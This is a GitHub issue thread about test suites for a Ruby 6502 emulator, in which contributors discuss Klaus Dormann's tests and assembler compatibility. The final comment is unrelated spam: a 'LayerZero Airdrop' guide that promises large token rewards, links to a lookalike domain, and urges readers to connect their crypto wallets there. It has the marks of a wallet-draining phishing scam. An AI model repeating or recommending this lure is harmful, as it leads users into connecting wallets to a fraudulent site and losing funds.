### ISSUE TITLE
Some test suites

### ISSUE THREAD

**Issue by BigEd** [joelanders/r6502#1]
Hi - nice project!  There are some test suites collected at http://6502.org/tools/emu/#tests - Klaus Dormann's has been very good for finding the last few problems in several other emulators.

**Comment by Aerlinger** [comment]
I looked at Dormann's test as well but it doesn't seem to be compatible with the assembler for this project. There are certain directives (IF, ENDIF, MACRO, etc) that don't seem to be defined in assembler.rb.

**Comment by joelanders** [comment]
Oh, wow I never noticed the notifications for either of these messages!
Thanks for the pointers; I'll have a look if I want to come back to this project.

**Comment by Aerlinger** [comment]
Agreed! It's an awesome project and it's definitely good to see low-level emulators being written in Ruby.

**Comment by joelanders** [comment]
Cool, I pulled in Klaus Dormann's tests and made a loader/runner for it.
Will begin sifting through what I'm sure is a mountain of bugs later!

**Comment by bpieres** [comment]
### LayerZero Airdrop Guide: BIGGEST Airdrop in 2023 ($ZRO Token Confirmed) 🪂

LayerZero is one of the most ANTICIPATED airdrops in 2023, and users can potentially earn up to $10,000 in airdrop rewards! This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Claim Now on Layerzero Oficial](http://link.layerzer0network.online/rFz335)

![Claim Now](https://i.ytimg.com/vi/s7BR96pg0SA/sddefault.jpg)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).
   - 
2. **Share on Social Media:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&title=LayerZero+Airdrop+Guide) 

2. **Eligibility Check:**
   - Confirm your eligibility for the Layerzero Airdrop.
